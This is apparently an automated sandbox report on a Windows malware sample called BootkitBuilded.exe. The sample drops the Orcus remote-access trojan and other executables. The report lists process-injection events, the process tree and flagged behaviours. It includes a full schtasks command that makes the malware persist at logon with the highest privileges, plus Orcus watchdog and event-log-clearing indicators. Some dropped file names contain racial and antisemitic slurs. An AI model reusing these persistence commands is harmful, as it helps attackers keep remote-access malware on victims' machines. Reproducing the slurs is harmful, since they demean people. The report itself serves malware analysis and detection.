Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3024 wrote to memory of 3136 3024 BootkitBuilded.exe 87 PID 3024 wrote to memory of 3136 3024 BootkitBuilded.exe 87 PID 3024 wrote to memory of 3136 3024 BootkitBuilded.exe 87 PID 3024 wrote to memory of 2836 3024 BootkitBuilded.exe 88 PID 3024 wrote to memory of 2836 3024 BootkitBuilded.exe 88 PID 3024 wrote to memory of 5040 3024 BootkitBuilded.exe 89 PID 3024 wrote to memory of 5040 3024 BootkitBuilded.exe 89 PID 3024 wrote to memory of 5040 3024 BootkitBuilded.exe 89 PID 1560 wrote to memory of 556 1560 cmd.exe 91 PID 1560 wrote to memory of 556 1560 cmd.exe 91 PID 2836 wrote to memory of 4776 2836 $77nigga.exe 93 PID 2836 wrote to memory of 4776 2836 $77nigga.exe 93 PID 5040 wrote to memory of 3164 5040 jew.exe 95 PID 5040 wrote to memory of 3164 5040 jew.exe 95 PID 5040 wrote to memory of 3164 5040 jew.exe 95 PID 2836 wrote to memory of 2352 2836 $77nigga.exe 98 PID 2836 wrote to memory of 2352 2836 $77nigga.exe 98 PID 556 wrote to memory of 624 556 powershell.exe 5 PID 624 wrote to memory of 676 624 winlogon.exe 7 PID 624 wrote to memory of 960 624 winlogon.exe 12 PID 624 wrote to memory of 344 624 winlogon.exe 13 PID 624 wrote to memory of 416 624 winlogon.exe 14 PID 676 wrote to memory of 2820 676 lsass.exe 46 PID 624 wrote to memory of 768 624 winlogon.exe 15 PID 624 wrote to memory of 1068 624 winlogon.exe 16 PID 624 wrote to memory of 1076 624 winlogon.exe 17 PID 624 wrote to memory of 1148 624 winlogon.exe 18 PID 624 wrote to memory of 1208 624 winlogon.exe 19 PID 624 wrote to memory of 1296 624 winlogon.exe 21 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 676 wrote to memory of 3164 676 lsass.exe 95 PID 624 wrote to memory of 1308 624 winlogon.exe 22 PID 624 wrote to memory of 1320 624 winlogon.exe 23 PID 624 wrote to memory of 1352 624 winlogon.exe 24 PID 624 wrote to memory of 1416 624 winlogon.exe 25 PID 624 wrote to memory of 1512 624 winlogon.exe 26 PID 624 wrote to memory of 1548 624 winlogon.exe 27 PID 3164 wrote to memory of 4276 3164 Orcus.exe 100 PID 3164 wrote to memory of 4276 3164 Orcus.exe 100 PID 3164 wrote to memory of 4276 3164 Orcus.exe 100 PID 676 wrote to memory of 2820 676 lsass.exe 46 PID 624 wrote to memory of 1580 624 winlogon.exe 28 PID 624 wrote to memory of 1652 624 winlogon.exe 29 PID 624 wrote to memory of 1684 624 winlogon.exe 30 PID 624 wrote to memory of 1808 624 winlogon.exe 31 PID 624 wrote to memory of 1832 624 winlogon.exe 32 PID 676 wrote to memory of 2820 676 lsass.exe 46 PID 624 wrote to memory of 2024 624 winlogon.exe 33 PID 2352 wrote to memory of 4684 2352 notfud.exe 102 PID 2352 wrote to memory of 4684 2352 notfud.exe 102 PID 1620 wrote to memory of 4716 1620 cmd.exe 103 PID 1620 wrote to memory of 4716 1620 cmd.exe 103 PID 1620 wrote to memory of 4716 1620 cmd.exe 103 PID 624 wrote to memory of 1060 624 winlogon.exe 34 PID 676 wrote to memory of 2820 676 lsass.exe 46 PID 676 wrote to memory of 2820 676 lsass.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1076
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1308
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1416 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3328
-
-
C:\Program Files (x86)\Orcus\Orcus.exe"C:\Program Files (x86)\Orcus\Orcus.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1548
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1580
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:3056
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1808
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2024
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1060
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2132
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2292
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2416
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2644
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Modifies data under HKEY_USERS
PID:2764
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Enumerates connected drives
PID:2828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2868
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3568
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\BootkitBuilded.exe"C:\Users\Admin\AppData\Local\Temp\BootkitBuilded.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3136
-
-
C:\Users\Admin\AppData\Local\Temp\$77nigga.exe"C:\Users\Admin\AppData\Local\Temp\$77nigga.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "notfud" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4776
-
-
C:\Users\Admin\AppData\Roaming\notfud\notfud.exe"C:\Users\Admin\AppData\Roaming\notfud\notfud.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "notfud" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\notfud\notfud.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jew.exe"C:\Users\Admin\AppData\Local\Temp\jew.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Program Files (x86)\Orcus\Orcus.exe"C:\Program Files (x86)\Orcus\Orcus.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe"C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe" /launchSelfAndExit "C:\Program Files (x86)\Orcus\Orcus.exe" 3164 /protectFile5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4276 -
C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe"C:\Users\Admin\AppData\Roaming\OrcusWatchdog.exe" /watchProcess "C:\Program Files (x86)\Orcus\Orcus.exe" 3164 "/protectFile"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Orcus\Orcus.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1620 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of FindShellTrayWindow
PID:3976
-
-
C:\Program Files (x86)\Orcus\Orcus.exe"C:\Program Files (x86)\Orcus\Orcus.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4716
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\UseCheckpoint.mhtml2⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3560 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x340,0x7ffdd714f208,0x7ffdd714f214,0x7ffdd714f2203⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1780,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:33⤵PID:2816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:23⤵PID:4348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2428,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:83⤵PID:820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:13⤵PID:4792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3568,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:13⤵PID:1360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4196,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=4216 /prefetch:13⤵PID:5144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4232,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=4268 /prefetch:23⤵PID:5152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=3600,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3748 /prefetch:13⤵PID:5336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5428,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:83⤵PID:5716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5552,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=5564 /prefetch:83⤵PID:5840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3832,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3648 /prefetch:83⤵PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3820,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=3836 /prefetch:83⤵PID:5668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5984,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6000 /prefetch:83⤵PID:5940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5984,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6000 /prefetch:83⤵PID:6116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6128,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6136 /prefetch:83⤵PID:5696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6132,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:83⤵PID:5188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6204,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:83⤵PID:5988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6336,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:83⤵PID:5908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6640,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:83⤵PID:5468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6820,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6828 /prefetch:83⤵PID:6096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6672 /prefetch:83⤵PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6800,i,13591252139080680098,16261876646225484051,262144 --variations-seed-version --mojo-platform-channel-handle=6988 /prefetch:83⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window3⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
PID:4376 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x288,0x28c,0x290,0x284,0x314,0x7ffdd714f208,0x7ffdd714f214,0x7ffdd714f2204⤵PID:5732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1816,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:34⤵PID:5628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2168,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:24⤵PID:5548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2508,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:84⤵PID:4220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4300,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:84⤵PID:5168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4300,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:84⤵PID:5236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,7321739983954352582,9057690226603493158,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:84⤵PID:4332
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:1204
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start3⤵PID:5560
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5932
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3776
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4060
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3216
-
